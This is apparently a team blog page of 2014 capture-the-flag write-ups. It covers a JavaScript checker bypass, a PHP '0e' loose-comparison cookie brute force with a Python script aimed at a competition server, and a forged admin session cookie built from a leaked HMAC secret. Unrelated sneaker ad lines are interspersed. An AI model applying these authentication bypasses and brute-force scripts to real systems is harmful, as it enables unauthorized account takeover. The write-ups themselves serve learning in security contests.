The flag is contained in closure made by calling checker. Since there is no any legal method to take variables from closure we have to deceive check tests somehow. It's JavaScript baby, we can redefine everything. The simplest solution is to redefine Array.apply in a way it returns empty array and to return empty array from our rand function. Obviously two empty arrays are the same size and have same elements. Let's do it:

Array.apply = function() {return [];};
function rand() {return [];}
check(rand);

This is it.

Sportswear free shipping | Nike Air Force 1'07 Essential blanche et or femme - Chaussures Baskets femme - Gov

Web 200

briskly — Sun, 01 Jun 2014 20:05:07 +0000

Category:

web

Event:

SecuInside CTF Quals 2014

The sense of this task is to login with user which idx=1. But we don't know, who has this idx

The algoritm for cookie is CRCR32 and this is strange. Because this hash purpose is not for crypto, it's for checksums. But for first try code of server look's good enough. REALY THANK TO ORGS, BECAUSE CODE IS GREAT AND SIMPLE, SO IT'S REALY EASY TO UNDERSTAND THE LOGIC OF SERVER

After reading some manuals we decided that the vuln is in hash. And found post about comparison issues in php whith float string

Php is not strongly typed, and that's why there is some magic with comprassions, and one of them is casting both string to float if they look like float. For example:

	if ("0e12" == "0")
		echo 1;
	else
		echo 2;

This code prints 1!!!! This is magic two different string are equal))

So we decided to brute cookie. We were always sending hash = "0" and different timestamp

Some calculation, we need first symbol to be "0", second "e", and all other is digits. So the probability is 1/16 * 1/16 * (10/16)**6. this is equal to 1/4300, that is not much for online brute

First part was done, we could logged-in with id we want. But what id we need?

After reading code we found this strange

public function islogin(){
			if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){
	 			exit("cannot be used Special character");
			}

			if( $_COOKIE['user_name'] == "admin" )	return 0;

			$salt = file_get_contents("../../long_salt.txt");

			if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){
				return 1;
			}

			return 0;
		}

The 6th string seems to be strange, why id admin is restricred. This is easy to bypass. We just need to login with name in uppercase, because php use case sensetive cmp, but sql not.

So the brute scipt is:

import requests

u1 = "http://219.240.37.153:5959/63972dfdacc8a838f618275d80d27c1d_h/index.php"
for i in xrange(0, 10000000):
    print i
    cookies = {
        "login_time": str(i),
        "user_name": "ADMIN",
        "hash": "0"
    }
    try:
        r = requests.get(u1, cookies=cookies).content
    except:
        continue
    if '' not in r:
        print r
        exit(0)

buy footwear | Women's Nike Air Jordan 1 trainers - Latest Releases , Ietp

es (web 200)

azrael — Mon, 17 Mar 2014 12:49:02 +0000

Category:

web

Event:

RuCTF Quals 2014

There is service raised at http://w2.quals.ructf.org/.

There is the authorization form and another form with strange functional on page. Also there is registration link.

At first we registered a new user with 1 / 1 as login / password. We saw that server set cookie:

Cookie: mojolicious=eyJuYW1lIjoiMSIsImV4cGlyZXMiOjEzOTUwNjI3OTh9--b844d3ef12af172ffebe4271f93d0548b92f637d

First part before "--" is base64-encoded user session information:

'eyJuYW1lIjoiMSIsImV4cGlyZXMiOjEzOTUwNjI3OTh9' == base64('{"name":"1","expires":1395062798}')

Second part after "--" is hash_hmac with sha1 of first part with a secret. We found secret in page source code:

<!-- secret: ructf -->

So we assumed that we need got admin's cookie. We replaced our nickname to 'admin' and generated new cookie with help of http://www.freeformatter.com/hmac-generator.html:

part1 = base64('{"name":"admin","expires":1395062798}')
part2 = hash_hmac('sha1', part1, 'ructf')

Result:

part1 + '--' + part2 ==
'eyJuYW1lIjoiYWRtaW4iLCJleHBpcmVzIjoxMzk1MDYyNzk4fQ==--f0b9d2795f0e8de1abafede4ea2aae54282e09a9'

So we logged in with new admin cookie and saw a message 'Hi, admin!'. Then we went to http://w2.quals.ructf.org/list and got flag 054ad7a734437d6853383ad919526dc5 by following http://w2.quals.ructf.org/very/super/secret/flag link.

Asics footwear | Air Jordan Sneakers

Challenge 1: Guerilla

azrael — Mon, 03 Feb 2014 22:13:54 +0000

Category:

web

ppc

Event:

Teaser Insomnihack 2014

First we see the text on the page: "You must specify a nick". After quick look into source code of the page we understand that our URL must contain GET-parameter 'nick' with random value.

Then server sends us some leet-modified string like

51xty tw0 plu5 0n3

and expecting from us solution of this expression in the same format.

Experimentally found that there is only 4 leet-modified characters: '1' == 'i', '3' == 'e', '5' == 's', '0' == 'o'.

There are can be various numbers and all 4 operations: plus, minus, times and divide by. So our solution has following steps:

unleetify string to normal words (ex. "sixty two plus one");
extract operation ("plus" -> "+");
turn 2 strings to numbers (62 and 1);
eval expression (62 + 1 = 63);
turn number to words ("sixty three");
leetify this string using same rules as server ("51xty thr33");
send string to server and get response. If there is no flag in response go to step 1.

After some number of iterations server will send us a flag: Fl4g4Th3W1nl33tP0w4h.

P.S. Because of script use WebSockets we had to write code on JavaScript.

Running sports | Vans Shoes That Change Color in the Sun: UV Era Ink Stacked & More – Fitforhealth News

Attachments:

1337-calc.html.zip